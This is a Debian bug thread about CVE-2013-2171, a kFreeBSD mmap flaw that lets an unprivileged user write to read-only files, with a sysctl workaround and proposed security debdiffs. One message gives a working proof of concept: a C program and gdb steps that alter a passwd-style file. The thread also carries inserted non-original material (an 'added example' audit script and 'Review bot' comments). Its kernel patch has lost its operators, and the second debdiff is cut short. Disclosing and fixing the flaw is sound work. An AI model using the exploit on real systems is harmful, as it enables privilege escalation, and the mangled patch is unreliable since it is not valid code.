Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Steven Chamberlain ste...@pyro.eu.org writes:
> Please could you do an upload of SVN r4525 to unstable?

I guess you mean 4523? or some special branch?

  Christoph

--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
On 21/06/13 09:56, Christoph Egger wrote:
> Steven Chamberlain ste...@pyro.eu.org writes:
>> Please could you do an upload of SVN r4525 to unstable?
>
> I guess you mean 4523? or some special branch?

Actually yes I meant r4523, although the more recent commits didn't change anything in /trunk/kfreebsd-9.

Regards,
--
Steven Chamberlain
ste...@pyro.eu.org
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
A suggested workaround on vulnerable systems is:

    sysctl security.bsd.unprivileged_proc_debug=0

(which works by disabling some functionality of GDB to non-root users)

Also the use of jails or securelevel could reduce the potential damage.

Regards,
--
Steven Chamberlain
ste...@pyro.eu.org
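A check for the workaround in the message above, as an added example that is not part of the original thread: it reports whether `security.bsd.unprivileged_proc_debug` is 0 on the running kernel and whether that value is also persisted, since a value set only with `sysctl` is lost at reboot. The function names, the result labels and the default `/etc/sysctl.conf` path are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit the workaround from this thread (CVE-2013-2171).
KEY="security.bsd.unprivileged_proc_debug"

# Print the last value assigned to KEY in a sysctl.conf-style file
# (a later line overrides an earlier one); print nothing if it is unset.
persisted_value() {
    [ -r "$1" ] || return 0
    sed -e 's/[#;].*$//' "$1" |
    awk -F= -v key="$KEY" '
        { k = $1; v = $2
          gsub(/[ \t]/, "", k); gsub(/[ \t]/, "", v)
          if (k == key) last = v }
        END { if (last != "") print last }'
}

# Classify a (runtime value, persisted value) pair.
classify() {
    runtime=$1 persisted=$2
    if [ -z "$runtime" ]; then echo unknown            # key absent on this kernel
    elif [ "$runtime" = 0 ] && [ "$persisted" = 0 ]; then echo ok
    elif [ "$runtime" = 0 ]; then echo runtime-only    # lost at next reboot
    elif [ "$persisted" = 0 ]; then echo persist-only  # set in file, not applied yet
    else echo exposed                                  # non-root tracing still allowed
    fi
}

# Audit the running kernel against a config file (path is an assumption).
audit() {
    conf=${1:-/etc/sysctl.conf}
    runtime=$(sysctl -n "$KEY" 2>/dev/null || true)
    classify "$runtime" "$(persisted_value "$conf")"
}

# Run only when asked to, e.g.:  sh audit.sh --run /etc/sysctl.conf
if [ "${1:-}" = "--run" ]; then audit "${2:-}"; fi
```

Anything other than `ok` on a kernel without the fix means the workaround is missing or will not survive a reboot.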
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org:

> forwarded 712664 http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Set Bug forwarded-to-address to 'http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc'.
> clone 712664 -1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Bug 712664 cloned as bug 712892
> reassign -1 src:kfreebsd-10
Bug #712892 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Bug reassigned from package 'src:kfreebsd-9' to 'src:kfreebsd-10'.
No longer marked as found in versions kfreebsd-9/9.0-11 and kfreebsd-9/9.0~svn223109-0.1.
Ignoring request to alter fixed versions of bug #712892 to the same values previously set
> retitle -1 kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap
Bug #712892 [src:kfreebsd-10] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Changed Bug title to 'kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap' from 'kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap'
> # not a real package version, but it or any later version will fix this
> fixed -1 kfreebsd-10/10.0~svn251901-1
Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap
The source kfreebsd-10 and version 10.0~svn251901-1 do not appear to match any binary packages
Marked as fixed in versions kfreebsd-10/10.0~svn251901-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
--
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org:

> found 712664 10.0~svn242489-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match any binary packages
Marked as found in versions kfreebsd-9/10.0~svn242489-1.
> found 712664 10.0~svn225709-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match any binary packages
Marked as found in versions kfreebsd-9/10.0~svn225709-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
--
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
Processed: Re: Bug#712664: Info received (Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap)
Processing commands for cont...@bugs.debian.org:

> # grrr
> notfound 712664 10.0~svn242489-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
The source 'kfreebsd-9' and version '10.0~svn242489-1' do not appear to match any binary packages
No longer marked as found in versions kfreebsd-9/10.0~svn242489-1.
> notfound 712664 10.0~svn225709-1
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
The source 'kfreebsd-9' and version '10.0~svn225709-1' do not appear to match any binary packages
No longer marked as found in versions kfreebsd-9/10.0~svn225709-1.
> found 712892 10.0~svn242489-1
Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap
Marked as found in versions kfreebsd-10/10.0~svn242489-1.
> found 712892 10.0~svn225709-1
Bug #712892 [src:kfreebsd-10] kfreebsd-10: CVE-2013-2171: Privilege escalation via mmap
Marked as found in versions kfreebsd-10/10.0~svn225709-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
--
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
712892: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712892
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Christoph,

Please could you do an upload of SVN r4525 to unstable?

kfreebsd-9 as shipped with wheezy is indeed vulnerable and I can confirm now that the fix works too.

Unfortunately the vulnerability is as simple and as serious as it sounds. A non-privileged user can overwrite any file having only read permissions.

    # cat /etc/foo
    steven:x:1000:1000:,,,:/home/steven:/bin/bash

    $ gdb testcase
    (gdb) run
    Program received signal SIGSEGV, Segmentation fault.
    0x00400631 in main () at main.c:13
    13 *ptr = 0; /* this will segfault */
    (gdb) set {char}(ptr+9) = 0x30
    (gdb)

    # cat /etc/foo
    steven:x::1000:,,,:/home/steven:/bin/bash

Regards,
--
Steven Chamberlain
ste...@pyro.eu.org

    #include <stdio.h>
    #include <errno.h>
    #include <unistd.h>
    #include <sys/mman.h>

    int main()
    {
        FILE *fp = fopen("/etc/foo", "r");
        int fd = fileno (fp);
        unsigned char *ptr = mmap (NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
        if (ptr == MAP_FAILED)
            return -1;
        *ptr = 0; /* this will segfault */
        return 0;
    }
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Attached are proposed debdiffs for an upload to wheezy-security, based on the version currently in wheezy. The versioning scheme for the last security upload (with +deb70.$n) looks a bit weird to me (and it has lower value than the next changelog entry). So I also attach a second debdiff, proposing a different form. Please could someone with the necessary access, open a security.d.o RT ticket asking permission to upload whichever one of these, and for a DSA to be issued? Thanks! Regards, -- Steven Chamberlain ste...@pyro.eu.org diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100 @@ -1,3 +1,17 @@ +kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high + + * Upload for wheezy-security + + -- Steven Chamberlain ste...@pyro.eu.org Wed, 19 Jun 2013 20:36:54 +0100 + +kfreebsd-9 (9.0-12) unstable; urgency=high + + * Team upload. + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Tue, 18 Jun 2013 13:20:50 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch --- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 1970-01-01 01:00:00.0 +0100 +++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 2013-06-19 20:49:15.0 +0100 
@@ -0,0 +1,28 @@ +Description: + Fix a bug that allowed a tracing process (e.g. gdb) to write + to a memory-mapped file in the traced process's address space + even if neither the traced process nor the tracing process had + write access to that file. [13:06] + (CVE-2013-2171) +Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch +Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc +Bug-Debian: http://bugs.debian.org/712664 +Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902 + +Index: kfreebsd-9-9.0/sys/vm/vm_map.c +=== +--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0 +0100 kfreebsd-9-9.0/sys/vm/vm_map.c 2013-06-18 13:39:13.104790989 +0100 +@@ -3704,6 +3704,12 @@ + vm_map_unlock_read(map); + return (KERN_PROTECTION_FAILURE); + } ++ if ((fault_typea VM_PROT_COPY) != 0 ++ (entry-max_protection VM_PROT_WRITE) == 0 ++ (entry-eflags MAP_ENTRY_COW) == 0) { ++ vm_map_unlock_read(map); ++ return (KERN_PROTECTION_FAILURE); ++ } + + /* +* If this page is not pageable, we have to get it for all possible diff -Nru kfreebsd-9-9.0/debian/patches/series kfreebsd-9-9.0/debian/patches/series --- kfreebsd-9-9.0/debian/patches/series2013-05-01 13:21:35.0 +0100 +++ kfreebsd-9-9.0/debian/patches/series2013-06-19 20:49:15.0 +0100 @@ -9,6 +9,7 @@ svn239447_SCTP_DoS.patch SA-12_08.linux.patch SA-13_05.nfsserver.patch +SA-13_06.mmap.patch # Other patches that might or might not be mergeable 001_misc.diff diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 21:12:56.0 +0100 
@@ -1,3 +1,11 @@ +kfreebsd-9 (9.0-12~deb7u1) wheezy-security; urgency=high + + * Team upload. + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Tue, 18 Jun 2013 13:20:50 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security diff -Nru kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch --- kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 1970-01-01 01:00:00.0 +0100 +++ kfreebsd-9-9.0/debian/patches/SA-13_06.mmap.patch 2013-06-19 20:49:15.0 +0100 @@ -0,0 +1,28 @@ +Description: + Fix a bug that allowed a tracing process (e.g. gdb) to write + to a memory-mapped file in the traced process's address space + even if neither the traced process nor the tracing process had + write access to that file. [13:06] + (CVE-2013-2171) +Origin: vendor, http://security.freebsd.org/patches/SA-13:06/mmap.patch +Bug: http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc +Bug-Debian: http://bugs.debian.org/712664 +Applied-Upstream: http://svnweb.freebsd.org/base?view=revisionrevision=251902 + +Index: kfreebsd-9-9.0/sys/vm/vm_map.c +=== +--- kfreebsd-9-9.0.orig/sys/vm/vm_map.c2011-07-06 21:06:44.0 +0100
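Review bot: in the first debdiff's debian/changelog hunk, the new top entry 9.0-10+deb70.2 is stacked above a 9.0-12 unstable entry, so the changelog is no longer in ascending version order, and the wheezy-security entry itself says only "Upload for wheezy-security" without naming the fix. Suggest dropping the unstable stanza from the security debdiff and stating the SA-13:06 / CVE-2013-2171 change and "Closes: #712664" in the security entry itself, as the second debdiff's 9.0-12~deb7u1 entry already does.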
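Review bot: the vm_map.c hunk inside SA-13_06.mmap.patch adds its new KERN_PROTECTION_FAILURE branch without a comment, and as rendered here the condition has lost its operators (`fault_typea VM_PROT_COPY`, `entry-max_protection VM_PROT_WRITE`, `entry-eflags MAP_ENTRY_COW`), as has the Applied-Upstream URL (`view=revisionrevision=251902`). Compare the patch against the Origin URL in its header before applying it, and consider a one-line comment above the block saying which faults it refuses (a VM_PROT_COPY fault on an entry whose max_protection lacks VM_PROT_WRITE and which is not copy-on-write), since that is the case the Description describes. The second debdiff's copy of the patch stops after the `---` file header, so its hunk and its debian/patches/series change cannot be reviewed from what is shown.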
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi Steven,

Cc'ing team@security.d.o

On Wed, Jun 19, 2013 at 09:23:49PM +0100, Steven Chamberlain wrote:
> Attached are proposed debdiffs for an upload to wheezy-security, based on the version currently in wheezy.

Thanks Steven and Christoph for working on this issue.

> The versioning scheme for the last security upload (with +deb70.$n) looks a bit weird to me (and it has lower value than the next changelog entry). So I also attach a second debdiff, proposing a different form.

Debdiff should be based on current wheezy(-security) version, so make the debdiff part for the changelog (i.e. without the unstable changelog part):

diff -Nru kfreebsd-9-9.0/debian/changelog kfreebsd-9-9.0/debian/changelog --- kfreebsd-9-9.0/debian/changelog 2013-05-01 13:59:20.0 +0100 +++ kfreebsd-9-9.0/debian/changelog 2013-06-19 20:49:15.0 +0100 
@@ -1,3 +1,17 @@ +kfreebsd-9 (9.0-10+deb70.2) wheezy-security; urgency=high + + * Team upload. + * Upload for wheezy-security + * Pick SVN 251902 from FreeBSD 9-STABLE to fix SA-13:06 / CVE-2013-2171: +Privilege escalation via mmap (Closes: #712664) + + -- Steven Chamberlain ste...@pyro.eu.org Wed, 19 Jun 2013 20:36:54 +0100 + kfreebsd-9 (9.0-10+deb70.1) wheezy-security; urgency=high * Upload for wheezy-security [...]

The versioning is indeed a bit ugly (preferred would have been also for the previous one +deb7uX, and incrementing X, there is a pending update for dev-ref describing this, see [1]).

 [1] http://bugs.debian.org/709218

> Please could someone with the necessary access, open a security.d.o RT ticket asking permission to upload whichever one of these, and for a DSA to be issued?

Small remark on this one: You also can do that in every case, no necessary permissions for RT are needed: write a mail to secur...@rt.debian.org with subject containing [Debian RT], see [2].

 [2] http://wiki.debian.org/rt.debian.org#Security_Team

Regards,
Salvatore
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Source: kfreebsd-9
Version: 9.0-11
Severity: grave
Tags: security upstream
Control: found -1 kfreebsd-9/9.0~svn223109-0.1

Privilege escalation via mmap:
http://security.freebsd.org/advisories/FreeBSD-SA-13:06.mmap.asc

This was introduced by r199819 when FreeBSD 9 was the SVN head. As such it affects 9.0 as well as 10.0 snapshots before today; I'm preparing a backport from 9-STABLE.

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (500, 'testing'), (1, 'experimental')
Architecture: kfreebsd-amd64 (x86_64)

Kernel: kFreeBSD 9.0-2-amd64
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages kfreebsd-image-9.0-2-amd64 depends on:
ii  devd           9.0+ds1-9
ii  freebsd-utils  9.0+ds1-9
ii  kbdcontrol     9.0+ds1-9
ii  kldutils       9.0+ds1-9

kfreebsd-image-9.0-2-amd64 recommends no packages.

kfreebsd-image-9.0-2-amd64 suggests no packages.

-- no debconf information
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Control: tags -1 pending

This is staged in SVN trunk as r4525, intended for upload to unstable very soon (and then we should request a DSA for wheezy).

I'd like to know first that the fix is really working and didn't break anything. All I know yet is that it builds.

p.s. I didn't see any SVN commit mails from Alioth, I wonder if something there is broken...

Regards,
--
Steven Chamberlain
ste...@pyro.eu.org
Processed: Re: Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Processing control commands:

> tags -1 pending
Bug #712664 [src:kfreebsd-9] kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Added tag(s) pending.

--
712664: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712664
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
Bug#712664: kfreebsd-9: CVE-2013-2171: Privilege escalation via mmap
Hi!

Steven Chamberlain ste...@pyro.eu.org writes:
> This is staged in SVN trunk as r4525, intended for upload to unstable very soon (and then we should request a DSA for wheezy).
>
> I'd like to know first that the fix is really working and didn't break anything. All I know yet is that it builds.

I can probably install it on the 2 kfreebsd-amd64 production systems here for testing tomorrow if you want. Also, feel free to ping me wrt upload.

  Christoph

--
9FED 5C6C E206 B70A 5857 70CA 9655 22B9 D49A E731
Debian Developer | Lisp Hacker | CaCert Assurer